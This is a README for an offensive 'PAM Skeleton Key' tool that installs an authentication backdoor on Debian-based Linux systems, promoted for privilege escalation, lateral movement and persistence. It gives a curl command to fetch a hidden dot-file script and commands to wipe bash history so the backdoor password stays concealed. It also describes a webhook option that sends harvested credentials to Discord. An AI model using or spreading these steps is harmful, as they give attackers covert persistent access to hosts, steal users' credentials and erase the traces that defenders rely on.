PAM Skeleton Key

This script automates the creation of a backdoor for Linux-PAM (Pluggable Authentication Modules). This is also known as a skeleton key.

---

Usage

Note: You must be root for this tool to be of use to you. This tool only works on x64 and x86 Debian based systems that use APT as the package manager. This tool is good for privilege escalation, lateral movement, and persistence. Messing with PAM files can cause permanent damage to host, use at your own discresion.

Download the tool silently:

curl -O https://raw.githubusercontent.com/her3ticAVI/linux-pam-backdoor/master/.backdoor.sh
sudo chmod +x .backdoor.sh
cat /dev/null > ~/.bash_history && history -c

The following banner shows the help menu:

sudo ./.backdoor.sh --help
Usage: ./.backdoor.sh [-v version] [-p password] [--webhook URL] [--restore] [--verbose]
Options:
  -v            Specify Linux-PAM version.
  -p            The 'magic' password for the backdoor.
  --webhook     Discord Webhook URL for credential exfiltration.
  --restore     Restore original PAM from backup.
  --verbose     Show all command output.

Make sure to clear bash history so others can't see the skeleton key password:

cat /dev/null > ~/.bash_history && history -c

Resources

• https://attack.mitre.org/software/S0007/
• https://github.com/segmentati0nf4ult/linux-pam-backdoor

Made with ❤️ by The Heretic